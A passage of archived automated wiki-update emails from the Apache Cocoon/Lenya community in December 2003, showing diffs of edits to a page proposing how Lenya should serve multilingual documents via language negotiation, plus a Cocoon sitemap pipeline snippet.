mean, a Lenya class i.e. the DefaultDocumentBuilder searches for a language identifier like en or de in the request uri. Based on that information the appropiate language version of the requested document is served. From [email protected] Thu Dec 25 20:00:11 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 17833 invoked from network); 25 Dec 2003 20:00:11 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 25 Dec 2003 20:00:11 -0000 Received: (qmail 64716 invoked by uid 500); 25 Dec 2003 20:00:00 -0000 Delivered-To: [email protected] Received: (qmail 64675 invoked by uid 500); 25 Dec 2003 20:00:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 64632 invoked from network); 25 Dec 2003 20:00:00 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 25 Dec 2003 20:00:00 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBPK03O18766 for <[email protected]>; Thu, 25 Dec 2003 21:00:04 +0100 Date: Thu, 25 Dec 2003 21:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] LenyaI18N Thu Dec 25 21:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaI18N , version: 36 on Thu Dec 25 20:10:39 2003 by RolfKulemann - # The user can switch the language without changing i.e. browser settings, which is sometimes not possible. Imagine a scenario in an university providing so called internet access points. On those access points changing browser settings is not possible. Of course this is seldom, but real. ? ^^ + # The user can switch a document's language without changing i.e. browser settings, which is sometimes not possible. Imagine a scenario in an university providing so called internet access points. On those access points changing browser settings is not possible. Of course this is seldom, but real. ? +++++++++ ^^ From [email protected] Thu Dec 25 21:00:11 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 34282 invoked from network); 25 Dec 2003 21:00:11 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 25 Dec 2003 21:00:11 -0000 Received: (qmail 91668 invoked by uid 500); 25 Dec 2003 20:59:59 -0000 Delivered-To: [email protected] Received: (qmail 91640 invoked by uid 500); 25 Dec 2003 20:59:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 91622 invoked from network); 25 Dec 2003 20:59:59 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 25 Dec 2003 20:59:59 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBPL03O18794 for <[email protected]>; Thu, 25 Dec 2003 22:00:03 +0100 Date: Thu, 25 Dec 2003 22:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] LenyaI18N Thu Dec 25 22:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaI18N , version: 48 on Thu Dec 25 21:09:13 2003 by RolfKulemann - '''...coming soon' ? - + ''...coming soon'' ? + From [email protected] Thu Dec 25 22:00:11 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 42549 invoked from network); 25 Dec 2003 22:00:11 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 25 Dec 2003 22:00:11 -0000 Received: (qmail 11239 invoked by uid 500); 25 Dec 2003 21:59:58 -0000 Delivered-To: [email protected] Received: (qmail 11202 invoked by uid 500); 25 Dec 2003 21:59:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 11191 invoked from network); 25 Dec 2003 21:59:57 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 25 Dec 2003 21:59:57 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBPM02O18821 for <[email protected]>; Thu, 25 Dec 2003 23:00:03 +0100 Date: Thu, 25 Dec 2003 23:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] LenyaI18N Thu Dec 25 23:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaI18N , version: 53 on Thu Dec 25 21:48:12 2003 by RolfKulemann - * Lenya system messages like the [cms (system) screens|LenyaCMSScreens] and notification messages send via email ? ^^ ^^^ ^^^ + * Lenya system messages i.e. displayed on [cms (system) screens|LenyaCMSScreens] or notification messages send via email ? +++++++++ ^^ + ^^ ^^ From [email protected] Fri Dec 26 10:00:17 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 51170 invoked from network); 26 Dec 2003 10:00:17 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 26 Dec 2003 10:00:17 -0000 Received: (qmail 18386 invoked by uid 500); 26 Dec 2003 09:59:51 -0000 Delivered-To: [email protected] Received: (qmail 18349 invoked by uid 500); 26 Dec 2003 09:59:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 18320 invoked from network); 26 Dec 2003 09:59:50 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 26 Dec 2003 09:59:50 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBQA02O19472 for <[email protected]>; Fri, 26 Dec 2003 11:00:03 +0100 Date: Fri, 26 Dec 2003 11:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] LenyaI18N Fri Dec 26 11:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaI18N , version: 57 on Fri Dec 26 10:05:32 2003 by 161.129.204.104 - * [''Techniques for multilingual Web sites'' by Jukka Korpela|http://www.cs.tut.fi/~jkorpela/multi/index-en.htm] ? - ------------------- + * ''[Techniques for multilingual Web sites|http://www.cs.tut.fi/~jkorpela/multi/index-en.htm]'' by Jukka Korpela ? + +++++++++++++++++++ - * [''Language Negotiation Notes'' by A.J.Flavell|http://ppewww.ph.gla.ac.uk/~flavell/www/lang-neg.html] ? - ----------------- + * ''[Language Negotiation Notes|http://ppewww.ph.gla.ac.uk/~flavell/www/lang-neg.html]'' by A.J.Flavell ? + ++++++++++++++++++ From [email protected] Fri Dec 26 11:00:24 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 62023 invoked from network); 26 Dec 2003 11:00:23 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 26 Dec 2003 11:00:23 -0000 Received: (qmail 54911 invoked by uid 500); 26 Dec 2003 10:59:56 -0000 Delivered-To: [email protected] Received: (qmail 54883 invoked by uid 500); 26 Dec 2003 10:59:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 54872 invoked from network); 26 Dec 2003 10:59:56 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 26 Dec 2003 10:59:56 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBQB09O19503 for <[email protected]>; Fri, 26 Dec 2003 12:00:09 +0100 Date: Fri, 26 Dec 2003 12:00:09 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] LenyaI18N Fri Dec 26 12:00:09 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaI18N , version: 67 on Fri Dec 26 11:02:35 2003 by 161.129.204.104 - \\ \\ I propose to create uri names in the systems default language and thats it. + \\ \\ ''I propose to create uri names in the systems default language and thats it.'' Otherwise the maintenance of a website would get much more complex. From [email protected] Fri Dec 26 12:00:05 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73106 invoked from network); 26 Dec 2003 12:00:05 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 26 Dec 2003 12:00:05 -0000 Received: (qmail 84322 invoked by uid 500); 26 Dec 2003 12:00:04 -0000 Delivered-To: [email protected] Received: (qmail 84187 invoked by uid 500); 26 Dec 2003 12:00:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 84176 invoked from network); 26 Dec 2003 12:00:03 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 26 Dec 2003 12:00:03 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBQC02O19534 for <[email protected]>; Fri, 26 Dec 2003 13:00:02 +0100 Date: Fri, 26 Dec 2003 13:00:02 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] LenyaI18N Fri Dec 26 13:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaI18N , version: 68 on Fri Dec 26 11:49:35 2003 by 161.129.204.104 - ''...coming soon'' + !! ServingI18NDoucments + The current approach to serve [multilingual documents|http://161.129.204.104:8080/lenya/docs-new/docs/components/multilingual/multilingual.html] with Lenya is quite good. + Nevertheless I want to propose the following enhancements/changes. + * The initial document language served should be derived from a user agent's accept-language header + * Use filename.locale.extension as basis pattern for multiligual urls + + !! ServingI18NMessages + + From [email protected] Fri Dec 26 20:00:09 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 90006 invoked from network); 26 Dec 2003 20:00:09 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 26 Dec 2003 20:00:09 -0000 Received: (qmail 10690 invoked by uid 500); 26 Dec 2003 19:59:59 -0000 Delivered-To: [email protected] Received: (qmail 10656 invoked by uid 500); 26 Dec 2003 19:59:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 10645 invoked from network); 26 Dec 2003 19:59:58 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 26 Dec 2003 19:59:58 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBQK02O19760 for <[email protected]>; Fri, 26 Dec 2003 21:00:02 +0100 Date: Fri, 26 Dec 2003 21:00:02 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Gerryallen Fri Dec 26 21:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Gerryallen , version: 2 on Fri Dec 26 19:25:51 2003 by Gerryallen - + + ### From [email protected] Fri Dec 26 22:00:10 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 21531 invoked from network); 26 Dec 2003 22:00:10 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 26 Dec 2003 22:00:10 -0000 Received: (qmail 99474 invoked by uid 500); 26 Dec 2003 21:59:58 -0000 Delivered-To: [email protected] Received: (qmail 99333 invoked by uid 500); 26 Dec 2003 21:59:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 99322 invoked from network); 26 Dec 2003 21:59:57 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 26 Dec 2003 21:59:57 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBQM02O19810 for <[email protected]>; Fri, 26 Dec 2003 23:00:02 +0100 Date: Fri, 26 Dec 2003 23:00:02 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] LenyaI18N Fri Dec 26 23:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaI18N , version: 69 on Fri Dec 26 21:43:03 2003 by RolfKulemann From [email protected] Sat Dec 27 09:00:16 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 47165 invoked from network); 27 Dec 2003 09:00:16 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 27 Dec 2003 09:00:16 -0000 Received: (qmail 51120 invoked by uid 500); 27 Dec 2003 08:59:51 -0000 Delivered-To: [email protected] Received: (qmail 51093 invoked by uid 500); 27 Dec 2003 08:59:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 51082 invoked from network); 27 Dec 2003 08:59:51 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 27 Dec 2003 08:59:51 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBR903O20437 for <[email protected]>; Sat, 27 Dec 2003 10:00:03 +0100 Date: Sat, 27 Dec 2003 10:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] WritingGenerators Sat Dec 27 10:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=WritingGenerators , version: 10 on Sat Dec 27 09:03:15 2003 by 161.129.204.104 - <map:pipeline internal-only="true">\\ ? -- + <map:pipeline internal-only="true"> - <map:match pattern="GenTransSer">\\ ? -- + <map:match pattern="GenTransSer"> - <!-- Generate/Transform/Serialize -->\\ ? -- + <!-- Generate/Transform/Serialize --> - <map:generate src="{request-param:GenSrc}"/>\\ ? -- + <map:generate src="{request-param:GenSrc}"/> - <map:transform src="{request-param:TransSrc}"/>\\ ? -- + <map:transform src="{request-param:TransSrc}"/> + !Generator Java source Stump + + actual i am looking for. + From [email protected] Sat Dec 27 10:00:17 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 57097 invoked from network); 27 Dec 2003 10:00:17 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 27 Dec 2003 10:00:17 -0000 Received: (qmail 69733 invoked by uid 500); 27 Dec 2003 09:59:51 -0000 Delivered-To: [email protected] Received: (qmail 69701 invoked by uid 500); 27 Dec 2003 09:59:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 69687 invoked from network); 27 Dec 2003 09:59:51 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 27 Dec 2003 09:59:51 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBRA03O20464 for <[email protected]>; Sat, 27 Dec 2003 11:00:03 +0100 Date: Sat, 27 Dec 2003 11:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] LenyaI18N WritingGenerators Sat Dec 27 11:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaI18N , version: 70 on Sat Dec 27 09:49:22 2003 by RolfKulemann Page: http://wiki.cocoondev.org/Wiki.jsp?page=WritingGenerators , version: 10 on Sat Dec 27 09:03:15 2003 by 161.129.204.104 - <map:pipeline internal-only="true">\\ ? -- + <map:pipeline internal-only="true"> - <map:match pattern="GenTransSer">\\ ? -- + <map:match pattern="GenTransSer"> - <!-- Generate/Transform/Serialize -->\\ ? -- + <!-- Generate/Transform/Serialize --> - <map:generate src="{request-param:GenSrc}"/>\\ ? -- + <map:generate src="{request-param:GenSrc}"/> - <map:transform src="{request-param:TransSrc}"/>\\ ? -- + <map:transform src="{request-param:TransSrc}"/> + !Generator Java source Stump + + actual i am looking for. + From [email protected] Sat Dec 27 11:00:17 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 66948 invoked from network); 27 Dec 2003 11:00:17 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 27 Dec 2003 11:00:17 -0000 Received: (qmail 88518 invoked by uid 500); 27 Dec 2003 10:59:50 -0000 Delivered-To: [email protected] Received: (qmail 88487 invoked by uid 500); 27 Dec 2003 10:59:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 88475 invoked from network); 27 Dec 2003 10:59:50 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 27 Dec 2003 10:59:50 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBRB02O20491 for <[email protected]>; Sat, 27 Dec 2003 12:00:03 +0100 Date: Sat, 27 Dec 2003 12:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] LenyaI18N Sat Dec 27 12:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaI18N , version: 76 on Sat Dec 27 11:08:32 2003 by RolfKulemann - * ''Use filename.locale.extension as basis pattern for multiligual urls''. This is just to go along with naming conventions mentioned in [mod_negotiation|http://httpd.apache.org/docs/content-negotiation.html] + * ''Use filename.locale.extension as basis pattern for multiligual urls''. This is just to go along with naming conventions mentioned in [mod_negotiation|http://httpd.apache.org/docs/content-negotiation.html] section ''Note on hyperlinks and naming conventions''. ? +++++++++++++++++++++++++++++++++++++++++++++++++++++++ From [email protected] Sat Dec 27 12:00:08 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 77931 invoked from network); 27 Dec 2003 12:00:08 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 27 Dec 2003 12:00:08 -0000 Received: (qmail 8857 invoked by uid 500); 27 Dec 2003 12:00:07 -0000 Delivered-To: [email protected] Received: (qmail 8701 invoked by uid 500); 27 Dec 2003 12:00:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 8690 invoked from network); 27 Dec 2003 12:00:06 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 27 Dec 2003 12:00:06 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBRC05O20518 for <[email protected]>; Sat, 27 Dec 2003 13:00:05 +0100 Date: Sat, 27 Dec 2003 13:00:05 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] LenyaI18N Sat Dec 27 13:00:05 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaI18N , version: 91 on Sat Dec 27 11:57:16 2003 by RolfKulemann - * __The initial document language served should be derived from a user agent's accept-language header if available.__ Should mean, the accept-language overrides the default publication language if the requested document is available in the accept-language.This would enhance useability. Of course it costs some effort and does not work in offline browsing mode. In case of offline browsing(pages are not served via a http server) changing the language shouldn't be a problem since I assume a website provides links to swtich the documents language. But this is a topic of offline page generation, where the topic ''serving multilingual documents in offline mode'' should be covered. See the [Debian|http://www.debian.org/] website for a real straightforward pattern of serving multilingual documents. Changing the browser's language settings while watching the debian website causes every page to be displayed in the newly set language as long as you do not specify a language identifier! in the url. At the bottom of the page, the user can access the language of the document being viewed via hyperlinks. This pattern can also be used, if webpages are not served by Lenya but i.e. by [Apache Http Server|http://httpd.apache.org/] using [mod_negotiation|http://httpd.apache.org/docs/content-negotiation.html]. Using this pattern fits imho best for the many cases where the user is able and aware of setting his browser's accept-language. The pattern also suits well enough for the other cases, but the user than has to switch the language on each page he visits, if the user agent doesn't send the user's preferred accept-language. ? ^^^ ^^^ + * __The initial document language served should be derived from a user agent's accept-language header if available.__ Should mean, the accept-language overrides the default publication language if the requested document is available in the accept-language.This would enhance useability. Of course it costs some effort and does not work in offline browsing mode. In case of offline browsing(pages are not served via a http server) changing the language shouldn't be a problem since I assume a website provides links to swtich the documents language. But this is a topic of offline page generation, where the question of ''how to serve multilingual documents in offline mode'' should be covered. See the [Debian|http://www.debian.org/] website for a real straightforward pattern of serving multilingual documents. Changing the browser's language settings while watching the debian website causes every page to be displayed in the newly set language as long as you do not specify a language! identifier in the url. At the bottom of the page, the user can access the language of the document being viewed via hyperlinks. This pattern can also be used, if webpages are not served by Lenya but i.e. by [Apache Http Server|http://httpd.apache.org/] using [mod_negotiation|http://httpd.apache.org/docs/content-negotiation.html]. Using this pattern fits imho best for the many cases where the user is able and aware of setting his browser's accept-language. The pattern also suits well enough for the other cases, but the user than has to switch the language on each page he visits, if the user agent doesn't send the user's preferred accept-language. ? ++++ + ^^^^ +++++++ ^ From [email protected] Sat Dec 27 13:00:06 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 90779 invoked from network); 27 Dec 2003 13:00:06 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 27 Dec 2003 13:00:06 -0000 Received: (qmail 31479 invoked by uid 500); 27 Dec 2003 13:00:03 -0000 Delivered-To: [email protected] Received: (qmail 31444 invoked by uid 500); 27 Dec 2003 13:00:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 31432 invoked from network); 27 Dec 2003 13:00:03 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 27 Dec 2003 13:00:03 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBRD02O20545 for <[email protected]>; Sat, 27 Dec 2003 14:00:03 +0100 Date: Sat, 27 Dec 2003 14:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] LenyaI18N Sat Dec 27 14:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaI18N , version: 98 on Sat Dec 27 13:10:47 2003 by RolfKulemann + !! Putting it all together + From [email protected] Sat Dec 27 14:00:08 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 5224 invoked from network); 27 Dec 2003 14:00:08 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 27 Dec 2003 14:00:08 -0000 Received: (qmail 58609 invoked by uid 500); 27 Dec 2003 14:00:04 -0000 Delivered-To: [email protected] Received: (qmail 58472 invoked by uid 500); 27 Dec 2003 14:00:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 58459 invoked from network); 27 Dec 2003 14:00:03 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 27 Dec 2003 14:00:03 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBRE03O20572 for <[email protected]>; Sat, 27 Dec 2003 15:00:03 +0100 Date: Sat, 27 Dec 2003 15:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] LenyaI18N Sat Dec 27 15:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaI18N , version: 101 on Sat Dec 27 13:20:22 2003 by RolfKulemann - Nevertheless I want to propose the following enhancements/changes, which lead into a compromise of using automatic content negotiation and user triggered language changes via hyperlinks. ? ^^ ^ -- + Nevertheless I want to propose the following enhancements/changes, which lead into a compromise of using automatic language negotiation and user triggered language changes via hyperlinks. ? ^^ ^^^^ From [email protected] Sat Dec 27 15:00:11 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 25421 invoked from network); 27 Dec 2003 15:00:11 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 27 Dec 2003 15:00:11 -0000 Received: (qmail 2242 invoked by uid 500); 27 Dec 2003 15:00:06 -0000 Delivered-To: [email protected] Received: (qmail 2222 invoked by uid 500); 27 Dec 2003 15:00:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 2211 invoked from network); 27 Dec 2003 15:00:06 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 27 Dec 2003 15:00:06 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBRF06O20599 for <[email protected]>; Sat, 27 Dec 2003 16:00:07 +0100 Date: Sat, 27 Dec 2003 16:00:07 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] LenyaI18N Sat Dec 27 16:00:06 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaI18N , version: 102 on Sat Dec 27 14:25:03 2003 by RolfKulemann - * __The initial document language served should be derived from a user agent's accept-language header if available.__ Should mean, the accept-language overrides the default publication language if the requested document is available in the accept-language.This would enhance useability. Of course it costs some effort and the automatic part of negotiation does not work in offline browsing mode. In case of offline browsing(pages are not served via a http server) changing the language 